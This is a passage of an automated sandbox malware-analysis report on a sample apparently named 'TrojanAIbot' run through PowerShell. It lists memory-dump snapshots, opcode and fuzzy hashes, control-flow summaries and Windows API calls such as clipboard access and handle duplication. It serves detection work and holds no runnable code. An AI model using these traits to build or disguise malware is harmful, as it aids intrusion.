                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ccc8376ff21662190d47153d6fdcb21e4bd086f1f2466d1f5903b22d188a8cda
                                                                                                                • Instruction ID: 5f23de9d8e33fd154dccd2aee48a3f6daa1f0291c0680f8aae1b811fa3ceca8e
                                                                                                                • Opcode Fuzzy Hash: ccc8376ff21662190d47153d6fdcb21e4bd086f1f2466d1f5903b22d188a8cda
                                                                                                                • Instruction Fuzzy Hash: 42F05E353081418FC3119F2DD854876BBF5EFCA71571900DAE184DB372DA61DC11CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74e678e5afd1a7ad11a673464119662bfeca998428599c2a3e4a92d18d731c4a
                                                                                                                • Instruction ID: 725606434f125da20107506ac20426bedd31100c4a8777c8ba5489d2f243e186
                                                                                                                • Opcode Fuzzy Hash: 74e678e5afd1a7ad11a673464119662bfeca998428599c2a3e4a92d18d731c4a
                                                                                                                • Instruction Fuzzy Hash: 35F0A7317007159FD7109AAAEC4497FB7E9EB88275B00092DE609D3740DF34AC4187B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67156bcdbc682505fae3d4379589ab8e659e6810ed76e09655c68d09889a84de
                                                                                                                • Instruction ID: fbe71e87cb2f7f11a002b33296c7a886aa5946e82faca4c22d06644be8d2556b
                                                                                                                • Opcode Fuzzy Hash: 67156bcdbc682505fae3d4379589ab8e659e6810ed76e09655c68d09889a84de
                                                                                                                • Instruction Fuzzy Hash: 5AF0E579300114CFCB00DB7ED800AAAB7E6FBC83587154194EA09EB365DB34EC128B90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19251ddd9733e19c5647808942e35217a16ec68e5db4e8ff9afc6ab0bd40f866
                                                                                                                • Instruction ID: baf0b0bf4c051d68fe3208cdb2d2f566cc1840da3865ce5b5939af1e788b0311
                                                                                                                • Opcode Fuzzy Hash: 19251ddd9733e19c5647808942e35217a16ec68e5db4e8ff9afc6ab0bd40f866
                                                                                                                • Instruction Fuzzy Hash: 61F0ECB16005085BE350BBA9C0197EB77AADBC532CF24816AC91A57384CE3E3802CBE0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3b4e947771173f656943d42229f50498beadb838784381a924829e485b57aba
                                                                                                                • Instruction ID: b3a67852313f2035e7b2757e5e672be90e35db656c677109de540a41e0d7dd7e
                                                                                                                • Opcode Fuzzy Hash: e3b4e947771173f656943d42229f50498beadb838784381a924829e485b57aba
                                                                                                                • Instruction Fuzzy Hash: C4E0E5793001118F8714AB1ED498C6AB7FAEFCE76571900AAE549DB731DA61EC11CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a19521352028ea8dd4c24ba2c93fa732ddeabe1fc878e29cbc9cced87b2a949
                                                                                                                • Instruction ID: cbddc1aa990fc2895ac30b92d816dd1b0d131e5d82f2a3a15b41e7628f22a3ad
                                                                                                                • Opcode Fuzzy Hash: 3a19521352028ea8dd4c24ba2c93fa732ddeabe1fc878e29cbc9cced87b2a949
                                                                                                                • Instruction Fuzzy Hash: 3AF0A0B130C3A15BCB0B2775A8583ED7FA5AF86328F040097D60587282CF7C6D0587E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • Instruction Fuzzy Hash: 94118C70C11219DFDB24EFB4D0493AEBBF0EB45306F1199AAC415A3290DB780688CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.2273072787.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_15_2_2c70000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 148930196ba43f278864cc506475ab79137ec404f217d56457d1938c4a3b4bad
                                                                                                                • Instruction ID: 7c37be896c29751a4908ac0184a1f5a179ce05a2ddceb4f1a0ec5c84a9bd4c89
                                                                                                                • Opcode Fuzzy Hash: 148930196ba43f278864cc506475ab79137ec404f217d56457d1938c4a3b4bad
                                                                                                                • Instruction Fuzzy Hash: 1E017874C11219DFCB18EFB4C0493AEBBF0EB45306F1098AA8815A3290DB780788CF91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:328
                                                                                                                Total number of Limit Nodes:36

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 2872890c2cf439c9f0141618dabb7eae6de178c04b6f3350449bbe3d8aa1d661
                                                                                                                • Instruction ID: 006dc1b61ec8364ed12014e75eaf249dcfb284def0f76a698b4bb3d2a6dbd75c
                                                                                                                • Opcode Fuzzy Hash: 2872890c2cf439c9f0141618dabb7eae6de178c04b6f3350449bbe3d8aa1d661
                                                                                                                • Instruction Fuzzy Hash: 89815670A00B158FDB24DF29E45579ABBF1FF88314F148A2ED48AD7A40D774E845CBA0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05496671
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: f83bf6e7b88a257a3d74a447095868a622d9f45dcb493cc92f69765f431ccec0
                                                                                                                • Instruction ID: 43635233704a245e61aed76ec617763d091e97fc7d0af5c981e57461ecdec1e3
                                                                                                                • Opcode Fuzzy Hash: f83bf6e7b88a257a3d74a447095868a622d9f45dcb493cc92f69765f431ccec0
                                                                                                                • Instruction Fuzzy Hash: A84136B8900349DFDB14CF99C489BAABFF5FB88314F258499D519AB321D734A841CFA0

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromIconResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668623891-0
                                                                                                                • Opcode ID: c3fd1c46ec06ab1faab061a67f305561df31492aecd8d86d8ecb277a7af8d5b1
                                                                                                                • Instruction ID: 9c64673ffcd741057c4bac63019c70c04bbe0af0dd8de229230b1906dd4af899
                                                                                                                • Opcode Fuzzy Hash: c3fd1c46ec06ab1faab061a67f305561df31492aecd8d86d8ecb277a7af8d5b1
                                                                                                                • Instruction Fuzzy Hash: DC318772904359AFCF16DFA9C845AEEBFF8EF09310F14805AE554E7261C3399864DBA0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: d26ba83c78197d0f382b8d3557c1e9e2d1d22e854868ed1f33ff62b4be36ee99
                                                                                                                • Instruction ID: 2bf2a39e73f51e431c1239b2e13ee26daa25cf02c066ceb15e697f6f5cc1351a
                                                                                                                • Opcode Fuzzy Hash: d26ba83c78197d0f382b8d3557c1e9e2d1d22e854868ed1f33ff62b4be36ee99
                                                                                                                • Instruction Fuzzy Hash: D03122B190124DDFEB10CFA9C884BDEBBF5BF48704F208059E445BB290DBB4A845CB51

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: a799ed03a26b02e5ea1b5e4533d3402c877f4495f9c3163d80fbde0a85b7ee78
                                                                                                                • Instruction ID: b0ad10644d739c3318c7381f9bb177d1c1d4c0d60c2919c61b09ea93b53d7ab4
                                                                                                                • Opcode Fuzzy Hash: a799ed03a26b02e5ea1b5e4533d3402c877f4495f9c3163d80fbde0a85b7ee78
                                                                                                                • Instruction Fuzzy Hash: 0B310FB190124DDFEB10CFA9C584BDDBBF5BB48718F208059E044AB290D7B8A845CF55

Control-flow Graph (image not included): blocks 151 f2e1a0-f2fda4 DuplicateHandle, 153 f2fda6-f2fdac, 154 f2fdad-f2fdca; edges 151->153, 151->154, 153->154
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F2FCD6,?,?,?,?,?), ref: 00F2FD97
Memory Dump Source
• Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: d40da83a2c9e81207e5407d91cf7f7d27ac08530340d02157614902a44ede151
• Instruction ID: be49afba43110a52e3561f91761728c932424527a9ac2d4dd096fd1f6c58c7dd
• Opcode Fuzzy Hash: d40da83a2c9e81207e5407d91cf7f7d27ac08530340d02157614902a44ede151
• Instruction Fuzzy Hash: 502105B5900219DFDB10CF9AD484ADEBBF4EB48314F14842AE914A7350C378A954DFA5

Control-flow Graph (image not included): blocks 157 f2fd09-f2fda4 DuplicateHandle, 158 f2fda6-f2fdac, 159 f2fdad-f2fdca; edges 157->158, 157->159, 158->159
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F2FCD6,?,?,?,?,?), ref: 00F2FD97
Memory Dump Source
• Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 2a31b2132eca89366664b31f8cf8a1653cdc7e7c5a4c79646c1da7ce471f548b
• Instruction ID: 3a1228ebcf7899c0251e9f957faee259f826155f5959fa6cf6bb5322851081fe
• Opcode Fuzzy Hash: 2a31b2132eca89366664b31f8cf8a1653cdc7e7c5a4c79646c1da7ce471f548b
• Instruction Fuzzy Hash: 882132B5C01209DFDB00CFA9D980ADEBBF4FB08320F14842AE918A3350C338A944CF60

Control-flow Graph (image not included): blocks 162 549e41c-549f974 CreateIconFromResourceEx, 164 549f97d-549f99a, 165 549f976-549f97c; edges 162->164, 162->165, 165->164
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0549F8C2,?,?,?,?,?), ref: 0549F967
Memory Dump Source
• Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 37d9746a025a88739aef9063efcb29f20ce3136cb3e958da18282c5c0e668b00
• Instruction ID: d3e4b69d3549e90156fa5f38b2f06bb4a5d1a3e9b740ac3996bb7fd6d2758fd6
• Opcode Fuzzy Hash: 37d9746a025a88739aef9063efcb29f20ce3136cb3e958da18282c5c0e668b00
• Instruction Fuzzy Hash: 181156B180034AEFDB10DFAAC944BDEBFF8EB48320F14801AE514A7250C379A954CFA4

Control-flow Graph (image not included): blocks 168 549d522-549d568, 169 549d56a-549d56d, 170 549d570-549d59f SetWindowTextW, 171 549d5a8-549d5c9, 172 549d5a1-549d5a7; edges 168->169, 168->170, 169->170, 170->171, 170->172, 172->171
APIs
• SetWindowTextW.USER32(?,00000000), ref: 0549D592
Memory Dump Source
• Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
• Opcode ID: c4bbcbeb4965982a01a2c7a1e8774cd60206e7d9904c96481ec575cca2eb07ca
• Instruction ID: 3e68266f2829d2b658988e56f515143804cf8de5fd17e11d54073198cf00229d
• Opcode Fuzzy Hash: c4bbcbeb4965982a01a2c7a1e8774cd60206e7d9904c96481ec575cca2eb07ca
• Instruction Fuzzy Hash: ED1144B2C0024A8FDB14CF9AC444BDFFBF5AF88324F10806AD458A7250D338A545CF61

Control-flow Graph (image not included): blocks 174 549d528-549d568, 175 549d56a-549d56d, 176 549d570-549d59f SetWindowTextW, 177 549d5a8-549d5c9, 178 549d5a1-549d5a7; edges 174->175, 174->176, 175->176, 176->177, 176->178, 178->177
APIs
• SetWindowTextW.USER32(?,00000000), ref: 0549D592
Memory Dump Source
• Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
• Opcode ID: 12d625c8935966d9f44cf156ac1baf6ea6b25fd619c3e8d6456ab157d395ce6b
• Instruction ID: f9710ea92dbaa06b82610af7d2dec646b2f82c982fc70a30bccce87872765132
• Opcode Fuzzy Hash: 12d625c8935966d9f44cf156ac1baf6ea6b25fd619c3e8d6456ab157d395ce6b
• Instruction Fuzzy Hash: 231112B6C002498FDB14CF9AC444BDEFBF4EB88324F10842AD859A7250D338A945CFA5

Control-flow Graph (image not included): blocks 180 f2d618-f2d658, 181 f2d660-f2d68b GetModuleHandleW, 182 f2d65a-f2d65d, 183 f2d694-f2d6a8, 184 f2d68d-f2d693; edges 180->181, 180->182, 181->183, 181->184, 182->181, 184->183
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
Memory Dump Source
• Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 7115f489be1dd5416f0dcc4c64ada354cc6c129f61a3262a3a016af5104e7ec2
• Instruction ID: a59d581b1167f2a3652a4984baa10d0a2ba8ef295ab09a642a530a28bc1896c1
• Opcode Fuzzy Hash: 7115f489be1dd5416f0dcc4c64ada354cc6c129f61a3262a3a016af5104e7ec2
• Instruction Fuzzy Hash: EF1110B5C003498FDB10CF9AD444ADEFBF4EB88324F20842AD418A7210C379A545CFA5

Control-flow Graph (image not included): blocks 186 549e460-549fcda SendMessageW, 188 549fcdc-549fce2, 189 549fce3-549fcf7; edges 186->188, 186->189, 188->189
APIs
• SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0549FCCD
Memory Dump Source
• Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 98254321178ba75110a7c69bbd289fc401324298feb6a00113f28a03d647e06e
• Instruction ID: 1ba9467828062e5d9f7abef8aaacdf3411dbb5f72a83938ba5abdcf1f6ca3106
• Opcode Fuzzy Hash: 98254321178ba75110a7c69bbd289fc401324298feb6a00113f28a03d647e06e
• Instruction Fuzzy Hash: 401110B58002499FDB10DF9AC449BDEBFF8FB48324F10841AE918A7200C378A984CFA1

Control-flow Graph (image not included): blocks 195 5ea21b0-5ea31aa OleInitialize, 197 5ea31ac-5ea31b2, 198 5ea31b3-5ea31d0; edges 195->197, 195->198, 197->198
APIs
• OleInitialize.OLE32(00000000), ref: 05EA319D
Memory Dump Source
• Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 53d8d6820db51ea677dfb0ca9ec97b43781dcd261ae6d09a5269c2b862605309
• Instruction ID: c1cede140e82d3147a39a46bb4c10f7bfd2252b745c20f92eaa70276d3537cb6
• Opcode Fuzzy Hash: 53d8d6820db51ea677dfb0ca9ec97b43781dcd261ae6d09a5269c2b862605309
• Instruction Fuzzy Hash: 661145B1800309CFDB10DFAAC444BDEBBF4EB48324F208859E559A7240C378A944CFA5

APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05EA3687), ref: 05EA4125
Memory Dump Source
• Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: d6d464f378150f7a5d62b14271f80fb02965155348a6ffc915bb1854559e4aec
• Instruction ID: dd3a15d90d62ce4758395c9cf996de78b132edee8f0ead14862a7e8b413aee9c
• Opcode Fuzzy Hash: d6d464f378150f7a5d62b14271f80fb02965155348a6ffc915bb1854559e4aec
• Instruction Fuzzy Hash: BD111DB5C046498FDB20DFAAD444BDEFBF4EB88224F10842AE458A7240D378A944CFA5

Control-flow Graph (image not included): blocks 191 549fc68-549fcda SendMessageW, 192 549fcdc-549fce2, 193 549fce3-549fcf7; edges 191->192, 191->193, 192->193
APIs
• SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0549FCCD
Memory Dump Source
• Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 9b796138b47cb57499764d445e4b63effca3689e692f018126bbab2d1265dd3c
• Instruction ID: 8770ac30f7ad106feaa1591bfab03d67e6b2fa4ad994001488b5d665cace8cfe
• Opcode Fuzzy Hash: 9b796138b47cb57499764d445e4b63effca3689e692f018126bbab2d1265dd3c
• Instruction Fuzzy Hash: F21103B5810209DFDB10DF99D585BDEBBF4FB48314F10881AD958A7350C379A984CFA1

APIs
• OleInitialize.OLE32(00000000), ref: 05EA319D
Memory Dump Source
• Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 58b857ad8f1bb647bdfc45954d6ab648997c837108bba9dcf1f883838dc86678
• Instruction ID: efa95f8521aea31cf6fb75f79b7e11612e5880f3c62e1f20655b7856af9e339e
• Opcode Fuzzy Hash: 58b857ad8f1bb647bdfc45954d6ab648997c837108bba9dcf1f883838dc86678
• Instruction Fuzzy Hash: 661112B5800309CFDB10DFA9D585BCEBBF4FB48324F24885AD559A7250C339A944CFA5

APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05EA3687), ref: 05EA4125
Memory Dump Source
• Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: 2a3edb99c006cdcd4306dcdb1cc6c3d1091f365b64ed46ee6e723aa657c270b1
• Instruction ID: 4a8a95f508368e55a308e0524aa29b305172d6fad64a3c033f679c44b8e74a8b
• Opcode Fuzzy Hash: 2a3edb99c006cdcd4306dcdb1cc6c3d1091f365b64ed46ee6e723aa657c270b1
• Instruction Fuzzy Hash: AD1100B6C04649CFDB10CFAAD544BCEFBF4BB48314F10852AD458A7250C378A544CFA5

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
Memory Dump Source
• Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: c1296de82013aedb1dc9805e1e9d6a89d6618d037c839871fe5149b10fc63e02
                                                                                                                • Instruction ID: a4b9d488fb8f43dc4771fd9df279b85ab2e5c74be7018839b83e51a02bf05067
                                                                                                                • Opcode Fuzzy Hash: c1296de82013aedb1dc9805e1e9d6a89d6618d037c839871fe5149b10fc63e02
                                                                                                                • Instruction Fuzzy Hash: 0DF017B58003198FDB10CF89E4047DEFBF0EB88328F24855AD059A7250C3B9A549CFA5
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 649e079aa128384da49fadb2baaafc4a8383a374e5a0c32f92db113545cdf6a8
                                                                                                                • Instruction ID: 55927ad2409670ce6357ea9a5e429e69398df3b6b148ba610d04002dbe7770e2
                                                                                                                • Opcode Fuzzy Hash: 649e079aa128384da49fadb2baaafc4a8383a374e5a0c32f92db113545cdf6a8
                                                                                                                • Instruction Fuzzy Hash: 75F039768043598EDB218F9AE4043CDFFE0AF59328F15854AC09DA7552C3782158CF95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b1116fb2846e76aefa7ebfe2e6cfcfb0bbdafde6a1b233988f5745f554e2d20
                                                                                                                • Instruction ID: 34712f5eca2356e4ac2074358950249b89255adacbd6a8397e24f257a544a777
                                                                                                                • Opcode Fuzzy Hash: 9b1116fb2846e76aefa7ebfe2e6cfcfb0bbdafde6a1b233988f5745f554e2d20
                                                                                                                • Instruction Fuzzy Hash: 7631166110E3C08FD7178B3488A06517F71AF57224F1E80DBD999CE5E7C229884AC772
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588473917.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dbd000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da8d5bfdd97f28c9713adbbf6a415898cbf7168c4fa038fcfd1bf5f7e7ce8dc4
                                                                                                                • Instruction ID: a0d5739d55016c7405c03ea1f6b0783ccc263f7506226363214cb3d96959db85
                                                                                                                • Opcode Fuzzy Hash: da8d5bfdd97f28c9713adbbf6a415898cbf7168c4fa038fcfd1bf5f7e7ce8dc4
                                                                                                                • Instruction Fuzzy Hash: 59213471604200DFDB14EF14D9C0B56BB62FB88314F34C56DE84A4B282D33AD847CA71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588473917.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dbd000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d59cad7d061a03c9c57744a33355835e90af0669690640d9e26018f1942e704
                                                                                                                • Instruction ID: 1d4ff12794018359978885baa3e388245d661e981f896416d21a20690defef20
                                                                                                                • Opcode Fuzzy Hash: 7d59cad7d061a03c9c57744a33355835e90af0669690640d9e26018f1942e704
                                                                                                                • Instruction Fuzzy Hash: 12218E75509380CFCB02DF20D990755BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4bb2948eb121392663c2fa925cfe1ddc97c337ae37b40404426c80c2bf1fa91
                                                                                                                • Instruction ID: f28d0f566fe081988b22a95fcab9f8a9e9e0b47042a79a6648d616947db6df2f
                                                                                                                • Opcode Fuzzy Hash: b4bb2948eb121392663c2fa925cfe1ddc97c337ae37b40404426c80c2bf1fa91
                                                                                                                • Instruction Fuzzy Hash: 5801F2310043049EE7209B25CC84B67BF99EF42764F28C41AED4A0A682C679D882CA75
                                                                                                                Memory Dump Source
